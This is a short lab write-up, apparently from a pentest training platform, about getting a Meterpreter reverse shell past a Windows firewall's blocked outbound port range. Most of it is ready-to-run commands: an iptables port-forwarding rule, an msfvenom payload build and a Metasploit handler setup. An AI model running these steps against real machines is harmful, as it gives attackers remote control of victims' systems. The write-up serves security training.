Where Notes Work
Firewall Bypass: Outbound Range
Hello friends, In this post, I’ll share with you how you can bypass Windows Firewall (Automatic Outbound Open Port Detection).
I solved this lab on PentesterAcademy, you can also do this lab here, if you are subscribed member.
Scenario: Windows machine is running with Firewall turned on and the Outbound port range 4444-6009 is blocked. The task is to knock the all ports and get a reverse shell using Metasploit.
Below, we can see that the block port range is defined as 4444-6009.
In, our attacker machine, i use iptables to forward port 6010 to port 4444.
$ iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 4444:6010 -j DNAT --to-destination 10.5.17.234:4444
// --to-destination ip is attacker machine ip address.
after, setting up iptables rule, i make payload using msfvenom.
$ msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=10.5.17.234 lport=4444 -f exe -o bypass.exe
// reverse_tcp_allports will knock the all ports for valid connection.
now, transfer the file to victim machine and download using firewall and powershell.
now, open msfconsole.
$ msf6 > use multi/handler
$ msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports
$ msf6 exploit(multi/handler) > set lhost eth0
$ msf6 exploit(multi/handler) > set lport 4444
$ msf6 exploit(multi/handler) > exploit
now, we can see we got our reverse shell.
If you face any problems, let me know in the comment section.